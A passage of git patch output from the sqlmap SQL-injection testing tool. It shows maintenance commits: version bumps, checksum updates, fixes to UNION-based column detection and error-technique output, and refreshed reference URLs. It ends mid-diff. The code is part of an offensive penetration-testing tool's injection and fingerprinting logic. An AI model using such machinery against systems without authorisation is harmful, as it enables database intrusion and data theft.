+2c5a655c8e94cbe2664ee497752ac1f2 lib/utils/search.py 236a8d9e596602b53f8e0aa09c30c0ef lib/utils/sqlalchemy.py dcc25183c6bd85b172c87cfcbc305ab6 lib/utils/timeout.py 3d230e342a6c8d60ac7c68c556fbba9b lib/utils/versioncheck.py @@ -124,9 +125,9 @@ e657b1b7a295a38ac9ce515158164f00 plugins/dbms/access/__init__.py 77686d7c7e287d5db0a9a87f2c7d4902 plugins/dbms/access/syntax.py 2f1d8706b51497623b2b59c07b552bdc plugins/dbms/access/takeover.py ead470b613e52e718a3062b63b518272 plugins/dbms/db2/connector.py -0884e475c98701f8e698150aa122fb76 plugins/dbms/db2/enumeration.py +4deeda463003ab71e7d2f34a263b5bbf plugins/dbms/db2/enumeration.py da9dccd1f9ec2cf1e53295125dd983a0 plugins/dbms/db2/filesystem.py -ba492b2aaa6432b5548c5a8fa5eec435 plugins/dbms/db2/fingerprint.py +b54dbf44590a5cbefb2b4f8e9a01a383 plugins/dbms/db2/fingerprint.py 95b35cbd859bbced44e7f8fd84486d75 plugins/dbms/db2/__init__.py 82d96d8fcfd565129580260040555623 plugins/dbms/db2/syntax.py 25f0fb28e9defcab48a2e946fbb7550a plugins/dbms/db2/takeover.py @@ -163,7 +164,7 @@ bf7842bb291e2297c3c8d1023eb3e550 plugins/dbms/maxdb/takeover.py f1f1541a54faf67440179fa521f99849 plugins/dbms/mssqlserver/enumeration.py 177e1d55d28ed3190bc0079b8126c6be plugins/dbms/mssqlserver/filesystem.py 51eb413ac62408965be20a812f2412c8 plugins/dbms/mssqlserver/fingerprint.py -affef90b1442285da7e89e46603c502e plugins/dbms/mssqlserver/__init__.py +f25c50a95e5390ecd32be5a011637349 plugins/dbms/mssqlserver/__init__.py 612be1929108e7b4512a49a4a3837bbc plugins/dbms/mssqlserver/syntax.py 08fe8ac7acdfc0e3168b5b069a7c73bf plugins/dbms/mssqlserver/takeover.py f6e1f3f09f32b9cb2ca11c016d373423 plugins/dbms/mysql/connector.py @@ -187,7 +188,7 @@ c8bb829d45752b98e6a03817b92e0fe5 plugins/dbms/postgresql/filesystem.py 470860d3e85d11a67f2220bffaa415e7 plugins/dbms/postgresql/__init__.py 20e6f48f496348be45f3402ebc265dbb plugins/dbms/postgresql/syntax.py 1287acf330da86a93c8e64aff46e3b65 plugins/dbms/postgresql/takeover.py -3009438ba259ca159c5ce9799f27dec1 plugins/dbms/sqlite/connector.py +80a2083a4fb7809d310c3d5ecc94e3c5 plugins/dbms/sqlite/connector.py 5194556e6b1575b1349f8ccfd773952b plugins/dbms/sqlite/enumeration.py 90fa97b84998a01dba7cc8c3329a1223 plugins/dbms/sqlite/filesystem.py ed52c198f3346ceabdef676e9f5d3c0f plugins/dbms/sqlite/fingerprint.py @@ -224,7 +225,7 @@ ec2ba8c757ac96425dcd2b97970edd3a shell/stagers/stager.asp_ 0c48ddb1feb7e38a951ef05a0d48e032 shell/stagers/stager.jsp_ 2f9e459a4cf6a58680978cdce5ff7971 shell/stagers/stager.php_ 4eaeef94314956e4517e5310a28d579a sqlmapapi.py -5d1d27e7237584c4499ee9a3e698e384 sqlmap.py +e585626909b2de432f1fb71e0944b130 sqlmap.py 4c3b8a7daa4bff52e01d4168be0eedbe tamper/apostrophemask.py 4115a55b8aba464723d645b7d3156b6e tamper/apostrophenullencode.py d7e9a979eff4d7315d804a181e66fc93 tamper/appendnullbyte.py From 73d8952f2a9c6dd65fa4fc4846c6aebb02611f09 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 4 May 2018 16:29:36 +0200 Subject: [PATCH 126/428] Potential patch for #3084 --- lib/core/decorators.py | 2 +- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/core/decorators.py b/lib/core/decorators.py index 94d0925c1d0..1bf5d512798 100644 --- a/lib/core/decorators.py +++ b/lib/core/decorators.py @@ -17,7 +17,7 @@ def cachedmethod(f, cache={}): """ def _(*args, **kwargs): - key = int(hashlib.md5("".join(str(_) for _ in (f, args, kwargs))).hexdigest()[:8], 16) + key = int(hashlib.md5("|".join(str(_) for _ in (f, args, kwargs))).hexdigest(), 16) & 0x7fffffffffffffff if key not in cache: cache[key] = f(*args, **kwargs) diff --git a/lib/core/settings.py b/lib/core/settings.py index ee4adaa4c04..7d292f43f01 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.5.1" +VERSION = "1.2.5.2" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 87a490555df..791ab9c5ae7 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -32,7 +32,7 @@ f42e346d33199b4f663cff6efe2be775 lib/core/common.py 0d082da16c388b3445e656e0760fb582 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py -04638422b6ad1613238a9abf4fdf6491 lib/core/decorators.py +93567739d591829c1fb9ff77a50bcc87 lib/core/decorators.py fbb55cc6100318ff922957b6577dc58f lib/core/defaults.py da98f5288aad57855c6d287ba3b397a1 lib/core/dicts.py 9ea8a043030796e6faef7f7e957729d5 lib/core/dump.py @@ -47,7 +47,7 @@ c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -0f03fed8767ab10c9bf9789d4deb0bde lib/core/settings.py +8a8b9515cd98eb1e1b0701baf84e9d35 lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 6306284edcccc185b2df085438572b0d lib/core/target.py From ec6ad3ce6803ce62eb9634d3b991612eb0ef7a46 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Sat, 5 May 2018 14:22:06 +0200 Subject: [PATCH 127/428] Bug fix (non-digit --union-char has not been working properly) --- lib/core/settings.py | 2 +- lib/techniques/union/test.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 7d292f43f01..6f4c3420105 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.5.2" +VERSION = "1.2.5.3" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/techniques/union/test.py b/lib/techniques/union/test.py index 6d94cb875b4..963222bef34 100644 --- a/lib/techniques/union/test.py +++ b/lib/techniques/union/test.py @@ -116,7 +116,7 @@ def _orderByTest(cols): items.append((count, ratio)) if not isNullValue(kb.uChar): - for regex in (kb.uChar, r'>\s*%s\s*<' % kb.uChar): + for regex in (kb.uChar.strip("'"), r'>\s*%s\s*<' % kb.uChar.strip("'")): contains = tuple((count, re.search(regex, _ or "", re.IGNORECASE) is not None) for count, _ in pages.items()) if len(filter(lambda _: _[1], contains)) == 1: retVal = filter(lambda _: _[1], contains)[0][0] diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 791ab9c5ae7..def96febf81 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -47,7 +47,7 @@ c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -8a8b9515cd98eb1e1b0701baf84e9d35 lib/core/settings.py +dd60aab11bccebf9ae75ebedb36a2368 lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 6306284edcccc185b2df085438572b0d lib/core/target.py @@ -97,7 +97,7 @@ bad83c6386adf345fbc982bdafbe3b93 lib/techniques/dns/use.py f999f2e88dea9ac8831eb2f468478b5f lib/techniques/error/use.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/__init__.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/union/__init__.py -a36be917cf86a5ee407c83d74567f324 lib/techniques/union/test.py +72b73cfb962cdbe9107e25df1bc43ffb lib/techniques/union/test.py 11ecf2effbe9f40b361843d546c3c521 lib/techniques/union/use.py 8d99c07416df40350ff8836d9d79ebb5 lib/utils/api.py 37dfb641358669f62c2acedff241348b lib/utils/brute.py From 1d382bcb4d2b03d5414f21f520ba5a7094e8b3d7 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Sat, 5 May 2018 14:33:00 +0200 Subject: [PATCH 128/428] Fixes #3086 --- lib/core/settings.py | 2 +- lib/techniques/union/test.py | 6 +++--- txt/checksum.md5 | 4 ++-- 3 files changed, 6 insertions(+), 6 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 6f4c3420105..936c23c7d25 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.5.3" +VERSION = "1.2.5.4" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/techniques/union/test.py b/lib/techniques/union/test.py index 963222bef34..0ca8f656937 100644 --- a/lib/techniques/union/test.py +++ b/lib/techniques/union/test.py @@ -117,9 +117,9 @@ def _orderByTest(cols): if not isNullValue(kb.uChar): for regex in (kb.uChar.strip("'"), r'>\s*%s\s*<' % kb.uChar.strip("'")): - contains = tuple((count, re.search(regex, _ or "", re.IGNORECASE) is not None) for count, _ in pages.items()) - if len(filter(lambda _: _[1], contains)) == 1: - retVal = filter(lambda _: _[1], contains)[0][0] + contains = [count for count, content in pages.items() if re.search(regex, content or "", re.IGNORECASE) is not None] + if len(contains) == 1: + retVal = contains[0] break if not retVal: diff --git a/txt/checksum.md5 b/txt/checksum.md5 index def96febf81..b275a378482 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -47,7 +47,7 @@ c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -dd60aab11bccebf9ae75ebedb36a2368 lib/core/settings.py +8fc5eef70dd6099c61c26c48767c4ef5 lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 6306284edcccc185b2df085438572b0d lib/core/target.py @@ -97,7 +97,7 @@ bad83c6386adf345fbc982bdafbe3b93 lib/techniques/dns/use.py f999f2e88dea9ac8831eb2f468478b5f lib/techniques/error/use.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/__init__.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/union/__init__.py -72b73cfb962cdbe9107e25df1bc43ffb lib/techniques/union/test.py +2075952d327723169de8fb7ac667c9c1 lib/techniques/union/test.py 11ecf2effbe9f40b361843d546c3c521 lib/techniques/union/use.py 8d99c07416df40350ff8836d9d79ebb5 lib/utils/api.py 37dfb641358669f62c2acedff241348b lib/utils/brute.py From 7a8add041285db1ea0f63b0fd08391d21907313e Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Sat, 5 May 2018 14:49:35 +0200 Subject: [PATCH 129/428] Update regarding #3068 --- lib/core/settings.py | 2 +- sqlmap.py | 4 ++-- txt/checksum.md5 | 4 ++-- 3 files changed, 5 insertions(+), 5 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 936c23c7d25..e85af5f8bf7 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.5.4" +VERSION = "1.2.5.5" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/sqlmap.py b/sqlmap.py index 4593e715b42..4d1a16a4359 100755 --- a/sqlmap.py +++ b/sqlmap.py @@ -264,8 +264,8 @@ def main(): raise SystemExit elif all(_ in excMsg for _ in ("twophase", "sqlalchemy")): - errMsg = "please update the 'sqlalchemy' package " - errMsg += "(Reference: https://github.com/apache/incubator-superset/issues/3447)" + errMsg = "please update the 'sqlalchemy' package (>= 1.1.11) " + errMsg += "(Reference: https://qiita.com/tkprof/items/7d7b2d00df9c5f16fffe)" logger.error(errMsg) raise SystemExit diff --git a/txt/checksum.md5 b/txt/checksum.md5 index b275a378482..e04494dc465 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -47,7 +47,7 @@ c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -8fc5eef70dd6099c61c26c48767c4ef5 lib/core/settings.py +2b1dd381a11c70766d31a272619dc356 lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 6306284edcccc185b2df085438572b0d lib/core/target.py @@ -225,7 +225,7 @@ ec2ba8c757ac96425dcd2b97970edd3a shell/stagers/stager.asp_ 0c48ddb1feb7e38a951ef05a0d48e032 shell/stagers/stager.jsp_ 2f9e459a4cf6a58680978cdce5ff7971 shell/stagers/stager.php_ 4eaeef94314956e4517e5310a28d579a sqlmapapi.py -e585626909b2de432f1fb71e0944b130 sqlmap.py +5c8583dd47f92935ceb41210a10eeebf sqlmap.py 4c3b8a7daa4bff52e01d4168be0eedbe tamper/apostrophemask.py 4115a55b8aba464723d645b7d3156b6e tamper/apostrophenullencode.py d7e9a979eff4d7315d804a181e66fc93 tamper/appendnullbyte.py From 3544793961fff7c4169cfe8857bf9c972a5fcec2 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 7 May 2018 10:48:35 +0200 Subject: [PATCH 130/428] Fixes #3088 --- lib/core/settings.py | 2 +- lib/techniques/union/test.py | 10 ++++++++-- txt/checksum.md5 | 4 ++-- 3 files changed, 11 insertions(+), 5 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index e85af5f8bf7..c28cf1fa7fc 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.5.5" +VERSION = "1.2.5.6" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/techniques/union/test.py b/lib/techniques/union/test.py index 0ca8f656937..e04248de12d 100644 --- a/lib/techniques/union/test.py +++ b/lib/techniques/union/test.py @@ -90,8 +90,8 @@ def _orderByTest(cols): kb.errorIsNone = False lowerCount, upperCount = conf.uColsStart, conf.uColsStop - if lowerCount == 1 or conf.uCols: - found = kb.orderByColumns or (_orderByTechnique(lowerCount, upperCount) if conf.uCols else _orderByTechnique()) + if kb.orderByColumns is None and (lowerCount == 1 or conf.uCols): # ORDER BY is not bullet-proof + found = _orderByTechnique(lowerCount, upperCount) if conf.uCols else _orderByTechnique() if found: kb.orderByColumns = found infoMsg = "target URL appears to have %d column%s in query" % (found, 's' if found > 1 else "") @@ -267,6 +267,8 @@ def _unionTestByCharBruteforce(comment, place, parameter, value, prefix, suffix) validPayload = None vector = None + orderBy = kb.orderByColumns + uChars = (conf.uChar, kb.uChar) # In case that user explicitly stated number of columns affected if conf.uColsStop == conf.uColsStart: @@ -301,6 +303,10 @@ def _unionTestByCharBruteforce(comment, place, parameter, value, prefix, suffix) if not all((validPayload, vector)) and not warnMsg.endswith("consider "): singleTimeWarnMessage(warnMsg) + if count and orderBy is None and kb.orderByColumns is not None: # discard ORDER BY results (not usable - e.g. maybe invalid altogether) + conf.uChar, kb.uChar = uChars + validPayload, vector = _unionTestByCharBruteforce(comment, place, parameter, value, prefix, suffix) + return validPayload, vector def unionTest(comment, place, parameter, value, prefix, suffix): diff --git a/txt/checksum.md5 b/txt/checksum.md5 index e04494dc465..713b23f21d0 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -47,7 +47,7 @@ c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -2b1dd381a11c70766d31a272619dc356 lib/core/settings.py +051375e24f79fe7967a7401d57e084cf lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 6306284edcccc185b2df085438572b0d lib/core/target.py @@ -97,7 +97,7 @@ bad83c6386adf345fbc982bdafbe3b93 lib/techniques/dns/use.py f999f2e88dea9ac8831eb2f468478b5f lib/techniques/error/use.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/__init__.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/union/__init__.py -2075952d327723169de8fb7ac667c9c1 lib/techniques/union/test.py +94d7a22bb6725a91e84ba2cd9973e96d lib/techniques/union/test.py 11ecf2effbe9f40b361843d546c3c521 lib/techniques/union/use.py 8d99c07416df40350ff8836d9d79ebb5 lib/utils/api.py 37dfb641358669f62c2acedff241348b lib/utils/brute.py From 9a63fb105597bc6979635fd21b3787c207aae3ac Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 8 May 2018 11:59:56 +0200 Subject: [PATCH 131/428] Trivial refactoring --- lib/core/settings.py | 2 +- lib/techniques/error/use.py | 4 ++-- txt/checksum.md5 | 4 ++-- 3 files changed, 5 insertions(+), 5 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index c28cf1fa7fc..b5c9b911861 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.5.6" +VERSION = "1.2.5.7" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/techniques/error/use.py b/lib/techniques/error/use.py index cf84aa71347..495fac78a22 100644 --- a/lib/techniques/error/use.py +++ b/lib/techniques/error/use.py @@ -414,7 +414,7 @@ def errorThread(): break if output and isListLike(output) and len(output) == 1: - output = output[0] + output = unArrayizeValue(output) with kb.locks.value: index = None @@ -446,7 +446,7 @@ def errorThread(): value = _errorFields(expression, expressionFields, expressionFieldsList) if value and isListLike(value) and len(value) == 1 and isinstance(value[0], basestring): - value = value[0] + value = unArrayizeValue(value) duration = calculateDeltaSeconds(start) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 713b23f21d0..a882f575370 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -47,7 +47,7 @@ c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -051375e24f79fe7967a7401d57e084cf lib/core/settings.py +a71c8f980be88d8e953631e387a97b96 lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 6306284edcccc185b2df085438572b0d lib/core/target.py @@ -94,7 +94,7 @@ f1decf0a987bd3a4bc757212cbe6a6c8 lib/takeover/xp_cmdshell.py 799faf9008527d2e9da9d923e50f685a lib/techniques/dns/test.py bad83c6386adf345fbc982bdafbe3b93 lib/techniques/dns/use.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/error/__init__.py -f999f2e88dea9ac8831eb2f468478b5f lib/techniques/error/use.py +f5fb02487edaf9adaa81d54324c84f8f lib/techniques/error/use.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/__init__.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/union/__init__.py 94d7a22bb6725a91e84ba2cd9973e96d lib/techniques/union/test.py From 13bf3e649a4bd5d82fe84893d3bf33be4caeefd9 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 8 May 2018 12:09:24 +0200 Subject: [PATCH 132/428] Trivial refactoring --- lib/core/common.py | 12 +++--------- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 6 insertions(+), 12 deletions(-) diff --git a/lib/core/common.py b/lib/core/common.py index e877dde5052..86d6c17c194 100644 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -2156,7 +2156,7 @@ def initCommonOutputs(): if line not in kb.commonOutputs[key]: kb.commonOutputs[key].add(line) -def getFileItems(filename, commentPrefix='#', unicode_=True, lowercase=False, unique=False): +def getFileItems(filename, commentPrefix='#', unicoded=True, lowercase=False, unique=False): """ Returns newline delimited items contained inside file """ @@ -2169,20 +2169,14 @@ def getFileItems(filename, commentPrefix='#', unicode_=True, lowercase=False, un checkFile(filename) try: - with openFile(filename, 'r', errors="ignore") if unicode_ else open(filename, 'r') as f: - for line in (f.readlines() if unicode_ else f.xreadlines()): # xreadlines doesn't return unicode strings when codec.open() is used + with openFile(filename, 'r', errors="ignore") if unicoded else open(filename, 'r') as f: + for line in (f.readlines() if unicoded else f.xreadlines()): # xreadlines doesn't return unicode strings when codec.open() is used if commentPrefix: if line.find(commentPrefix) != -1: line = line[:line.find(commentPrefix)] line = line.strip() - if not unicode_: - try: - line = str.encode(line) - except UnicodeDecodeError: - continue - if line: if lowercase: line = line.lower() diff --git a/lib/core/settings.py b/lib/core/settings.py index b5c9b911861..0c6fe119319 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.5.7" +VERSION = "1.2.5.8" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index a882f575370..c6b2556675a 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -28,7 +28,7 @@ c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py b1990c7805943f0c973a853bba981d96 lib/core/agent.py fd8f239e259afaf5f24bcf34a0ad187f lib/core/bigarray.py -f42e346d33199b4f663cff6efe2be775 lib/core/common.py +2e81c8be79eb98227affcfd7bd25c702 lib/core/common.py 0d082da16c388b3445e656e0760fb582 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py @@ -47,7 +47,7 @@ c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -a71c8f980be88d8e953631e387a97b96 lib/core/settings.py +f49b5204228e41b1cfab5ba231272f09 lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 6306284edcccc185b2df085438572b0d lib/core/target.py From 4a8f01c9dc77c1c17d7e4da53d6294a071868c0c Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 8 May 2018 14:06:34 +0200 Subject: [PATCH 133/428] Minor updates --- lib/core/settings.py | 2 +- lib/request/rangehandler.py | 2 +- plugins/dbms/db2/connector.py | 6 +++--- plugins/dbms/informix/connector.py | 6 +++--- plugins/dbms/mssqlserver/connector.py | 6 +++--- plugins/dbms/mssqlserver/fingerprint.py | 4 ++-- plugins/dbms/mssqlserver/takeover.py | 4 ++-- plugins/dbms/oracle/connector.py | 8 ++++---- plugins/dbms/postgresql/fingerprint.py | 10 +++++++--- txt/checksum.md5 | 18 +++++++++--------- 10 files changed, 35 insertions(+), 31 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 0c6fe119319..362c85b1ccf 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.5.8" +VERSION = "1.2.5.9" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/request/rangehandler.py b/lib/request/rangehandler.py index 47d703ce127..6c7e33ffa8d 100644 --- a/lib/request/rangehandler.py +++ b/lib/request/rangehandler.py @@ -32,7 +32,7 @@ class HTTPRangeHandler(urllib2.BaseHandler): urllib2.install_opener(opener) # create Request and set Range header - req = urllib2.Request('http://www.python.org/') + req = urllib2.Request('https://www.python.org/') req.header['Range'] = 'bytes=30-50' f = urllib2.urlopen(req) """ diff --git a/plugins/dbms/db2/connector.py b/plugins/dbms/db2/connector.py index 7bd4b86d420..dcb2b5fca5b 100644 --- a/plugins/dbms/db2/connector.py +++ b/plugins/dbms/db2/connector.py @@ -19,9 +19,9 @@ class Connector(GenericConnector): """ - Homepage: http://code.google.com/p/ibm-db/ - User guide: http://code.google.com/p/ibm-db/wiki/README - API: http://www.python.org/dev/peps/pep-0249/ + Homepage: https://github.com/ibmdb/python-ibmdb + User guide: https://github.com/ibmdb/python-ibmdb/wiki/README + API: https://www.python.org/dev/peps/pep-0249/ License: Apache License 2.0 """ diff --git a/plugins/dbms/informix/connector.py b/plugins/dbms/informix/connector.py index d4c5354ea42..e85de013fc5 100644 --- a/plugins/dbms/informix/connector.py +++ b/plugins/dbms/informix/connector.py @@ -19,9 +19,9 @@ class Connector(GenericConnector): """ - Homepage: http://code.google.com/p/ibm-db/ - User guide: http://code.google.com/p/ibm-db/wiki/README - API: http://www.python.org/dev/peps/pep-0249/ + Homepage: https://github.com/ibmdb/python-ibmdb + User guide: https://github.com/ibmdb/python-ibmdb/wiki/README + API: https://www.python.org/dev/peps/pep-0249/ License: Apache License 2.0 """ diff --git a/plugins/dbms/mssqlserver/connector.py b/plugins/dbms/mssqlserver/connector.py index 36f69ef3227..997a69cd040 100644 --- a/plugins/dbms/mssqlserver/connector.py +++ b/plugins/dbms/mssqlserver/connector.py @@ -21,9 +21,9 @@ class Connector(GenericConnector): """ - Homepage: http://pymssql.sourceforge.net/ - User guide: http://pymssql.sourceforge.net/examples_pymssql.php - API: http://pymssql.sourceforge.net/ref_pymssql.php + Homepage: http://www.pymssql.org/en/stable/ + User guide: http://www.pymssql.org/en/stable/pymssql_examples.html + API: http://www.pymssql.org/en/stable/ref/pymssql.html Debian package: python-pymssql License: LGPL diff --git a/plugins/dbms/mssqlserver/fingerprint.py b/plugins/dbms/mssqlserver/fingerprint.py index 354b05b4807..f5a5af27ea8 100644 --- a/plugins/dbms/mssqlserver/fingerprint.py +++ b/plugins/dbms/mssqlserver/fingerprint.py @@ -136,8 +136,8 @@ def checkDbmsOs(self, detailed=False): self.createSupportTbl(self.fileTblName, self.tblField, "varchar(1000)") inject.goStacked("INSERT INTO %s(%s) VALUES (%s)" % (self.fileTblName, self.tblField, "@@VERSION")) - # Reference: http://en.wikipedia.org/wiki/Comparison_of_Microsoft_Windows_versions - # http://en.wikipedia.org/wiki/Windows_NT#Releases + # Reference: https://en.wikipedia.org/wiki/Comparison_of_Microsoft_Windows_versions + # https://en.wikipedia.org/wiki/Windows_NT#Releases versions = { "NT": ("4.0", (6, 5, 4, 3, 2, 1)), "2000": ("5.0", (4, 3, 2, 1)), diff --git 